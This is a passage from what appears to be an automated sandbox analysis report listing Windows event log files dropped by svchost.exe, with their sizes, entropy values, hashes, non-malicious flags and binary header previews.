Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	97584
Entropy (8bit):	3.1193008477742024
Encrypted:	false
SSDEEP:	768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEtbcEtQ
MD5:	76F7DE1F3382A11064C37C88A160BE55
SHA1:	A607DF794AE353E96AA98C81C8147EA64E135312
SHA-256:	26BA16DBF0ED3D6369104DD66075A82840C89352760D73976626C08ABA248119
SHA-512:	D93DDD602E78A77CC94B3D80B03C31DC029CF792858249CB6F86A4BCC8511F8378EB55EC90786A35F9D45B0796E97AF46B736EABA719A72E3C82FE405EF29A4D
Malicious:	false
Preview:	ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&.......>h..................................................%_..........................]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66816
Entropy (8bit):	4.1054274421917745
Encrypted:	false
SSDEEP:	384:3iHG25hNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5p7iHG26bik5pKik5yY5Lx:8XLpBVi7CPqmxV
MD5:	D97EB8FB14D1D1D41BF3F2B2F86E721D
SHA1:	3365D1DD4B074355A98DE7F25BA770ED715A08A2
SHA-256:	A0F24EF6BA119787DDAF4F242BD4AB1E834353C6A7B23AFA7B031EA3BABB4B3A
SHA-512:	42A3924D317290D91910E27E71CA3E6CE094014ABCAF2B441C786E03898947C2E2AA61884A3826904434D795F1AB82EC300151CE41459BE8B3EEFC17B2087422
Malicious:	false
Preview:	ElfChnk.'.......,.......'.......,...........`+..`....eRP....................................................................".??................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......,..........%fg.........Z..&...............................................................L.......b...p.!....................%fg..0.U.f....5U.f.......t...,........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^1...........h...........................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.322146858454247
Encrypted:	false
SSDEEP:	384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
MD5:	D8DABE7AC7FE8F2D1CD853002971BB8A
SHA1:	AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
SHA-256:	DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
SHA-512:	A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
Malicious:	false
Preview:	ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.475265357832672
Encrypted:	false
SSDEEP:	1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
MD5:	605D94FA0C65C59EECEECC2BEB2F61B5
SHA1:	28CA14F5E02A0A0348C4AC4A22BC228390B64F94
SHA-256:	4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
SHA-512:	10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
Malicious:	false
Preview:	ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	70808
Entropy (8bit):	4.463685706432065
Encrypted:	false
SSDEEP:	1536:qpfNJyh8H86PbkyzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBApfNJyh87:qpNJK8H86PbkyzFyNsk4cLSKph9YC/cf
MD5:	B32E7E1E829503603F6C47F0DCB7072A
SHA1:	0F06B332DCBFB822AA71E3293311BA11EAE1C89B
SHA-256:	56E1F6FC90CEB3699414BC1930CF7B3DE11D221435847FD2866E13C2632B65F2
SHA-512:	11E7E3DD141A13F1BFCD457673DBB70B0FA069FA5BF956DF14CD323331190E0C92235D6715B38D56F883E6D5CD12A1EB1C76CA25745CA03BE3FD4FC2CB3CC587
Malicious:	false
Preview:	ElfChnk.+.......[.......+.......[...........X]...^..e=7K........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:........x...R...........fg.........Z..&...............................................................8.......P.....!....nqm......... ....fg..0.U.f..../U.f...........R........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.\|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L12........r.i.tx.....(...S.......%V..fg.........Z..&...............................................................8.......P.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.517082344367377
Encrypted:	false
SSDEEP:	384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
MD5:	2628D3458E9FBE638FC3A49E317866FA
SHA1:	8DB033ED373F8A837073679CE0F3B5DC1BD7085B
SHA-256:	D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
SHA-512:	6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
Malicious:	false
Preview:	ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.314954486903959
Encrypted:	false
SSDEEP:	384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
MD5:	864CAA67E4BF2A335E088526FF347CD9
SHA1:	64E224001D864A18D4999F5D33A42C532877A361
SHA-256:	C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
SHA-512:	B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
Malicious:	false
Preview:	ElfChnk.........A...............A............u...v..........................................................................c.w.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.773262505715791
Encrypted:	false
SSDEEP:	384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
MD5:	C06B3BF303EBDD17D76D87B596EE5407
SHA1:	BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
SHA-256:	26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
SHA-512:	7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
Malicious:	false
Preview:	ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2371167268838485
Encrypted:	false
SSDEEP:	384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
MD5:	3F2115642206C3D448781C58F4EE8AF3
SHA1:	1408F4FF05D6887F74B445E296BC9B69163EDDAE
SHA-256:	84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
SHA-512:	C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
Malicious:	false
Preview:	ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1631981097466806
Encrypted:	false
SSDEEP:	384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
MD5:	CBAE5379AAAD2B6A84714F5CEA39ACFA
SHA1:	A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
SHA-256:	726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
SHA-512:	7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
Malicious:	false
Preview:	ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.036288214996343
Encrypted:	false
SSDEEP:	384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
MD5:	80B64057A5C06D0016A06F2D493CF301
SHA1:	452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
SHA-256:	5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
SHA-512:	4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
Malicious:	false
Preview:	ElfChnk.\...............\.......................X...j.......................................................................LU.t.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.166433348209963
Encrypted:	false
SSDEEP:	384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
MD5:	9AB3073B8BEBBC3C1E9DCB47217C8E27
SHA1:	33477618A675262EFDC74FACE70AE448EE9CAA05
SHA-256:	E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
SHA-512:	58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
Malicious:	false
Preview:	ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	72368
Entropy (8bit):	4.60963870067552
Encrypted:	false
SSDEEP:	384:Ph9MmMutBM4TMyMGMOh9MmMutBM4TMyMGMDSKBKYKWKOKHxK/4KFKwKZKD4aKdK6:P9tF15x
MD5:	F8B40313DE342B0E35D61A102B0548BD
SHA1:	997AC59B09D6578ACA6E0D4B4DCB64F101D4AFDE
SHA-256:	0B8AEF71A5F8D4A5D35D79AFFF944D7604D2F9FFB84154BB600EAC63E13029C9
SHA-512:	119B04E30DBDBE7F4A4F9FD6A06A653A9BCDA7D7BE776B58C90245D4D8CCEF595720B1B280C1779F59F18600C84D0491F3B8A0090D4061F69DCEC05FDF9DD367
Malicious:	false
Preview:	ElfChnk..%.......&.......%.......&..........x........@..................................................................................................................6...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................E...........&.......................................**.......%.......h.'fg.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
Category:	dropped
Size (bytes):	79016
Entropy (8bit):	1.821005777296527
Encrypted:	false
SSDEEP:	384:y7hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUm8UmkhL6UsE0Zi:8Y7L8oY7L8
MD5:	F73D892AA99BAF0297984BDD5605B50F
SHA1:	85BCB0CBC55BA0E87D447748198D658C80338CF5
SHA-256:	8198B348D9B763A8959CAF34D4B18790A3923C461D6E6DC53E6626A7AF34FA95
SHA-512:	0CD928FFE7B372D05A16BD7FCC749B1F039F9217C1821F9D84C327683A931249436F4BD008D1773568E4FF97347FA1E66A5E15083A2F69B8461570564E0CE5FD
Malicious:	false
Preview:	ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4...i...................................................................../X-r................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67776
Entropy (8bit):	0.3676133553036576
Encrypted:	false
SSDEEP:	48:MbVWd8iKrP+8QNRBEZWTENO4brBE3o9cU/6yxVWd8iKrP+8QNRBEZWTENO4brBEQ:qSNVaO8ioL/6yTSNVaO8ioL/6y
MD5:	4D5DE4B46EAA9B9BB810C2254F762E30
SHA1:	84634EC64E2C0BF8BB4A6F91468A38C2B79AFC39
SHA-256:	C8FB02C63E708DB5EF6333FB3E5B499074ED90E91A2ABC6E376FED79CF4D6C87
SHA-512:	1D48C5CB392830C16EAA868F63B9AEC744F6023739D80C373DA2CF55610A4BC8BB87EEF46268BFB4D1F8356CCAFF2F0171AADBE8570C10C36F89AA11F1E7B1E3
Malicious:	false
Preview:	ElfChnk.............................................=.O~....................................................................?.EY................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**................n.g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9658503180918458
Encrypted:	false
SSDEEP:	384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
MD5:	9961A2C4F5AC430AB4FE55D69904E2C9
SHA1:	BA49A1A12A889812148BECC8D5B285AD418D54FE
SHA-256:	EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
SHA-512:	B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
Malicious:	false
Preview:	ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	87888
Entropy (8bit):	3.631964198916393
Encrypted:	false
SSDEEP:	768:iaYa4aMakaca4aUaoaYav4akaYaoa0aoaQaca4aga0aYaYawagagaAa8a0a4auX4:uLY
MD5:	C02009B2660668C7D2F99CFC6E750550
SHA1:	9308124472EBC9C83206FD06EEDAAFFD2C394BE4
SHA-256:	4E688774F0745D8C2E096CE31A9CAA665CC5844953FFD7AF352032A499DDD1A4
SHA-512:	157DEFFC5134FEC1BE12130F1348988350C364174A7F6C61720FD122A535FEE58E4EAEA8F57F0735190A18A8E317C14800366DD1F3E6D35D5D37FC35C0618AD7
Malicious:	false
Preview:	ElfChnk.........@...............@...............`....A.......................................................................7..................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................*......#.......\|...g..........Z..&...............................................................P.......h...C.!.................\|...g...p........f.K...........#........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.A.C.-.F.i.l.e.V.i.r.t.u.a.l.i.z.a.t.i.o.n.+..N.ID.v...W^.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.A.C.-.F.i.l.e.V.i.r.t.u.a.l.i.z.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l...7..{;.......................r.......~...........................$.N......9.\.D.e.v.i

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3650161876414235
Encrypted:	false
SSDEEP:	384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
MD5:	346E087AE87A771402B2E38619AB7B71
SHA1:	4B7EFEA99E401A5E6C0D115E2B27C48778704C13
SHA-256:	82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
SHA-512:	63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
Malicious:	false
Preview:	ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.335318634068108
Encrypted:	false
SSDEEP:	384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
MD5:	3B31610BEABB5895A19C346C64C234C6
SHA1:	84316C06991A51AD91C247130B615F0E56CD4D01
SHA-256:	EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
SHA-512:	2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
Malicious:	false
Preview:	ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
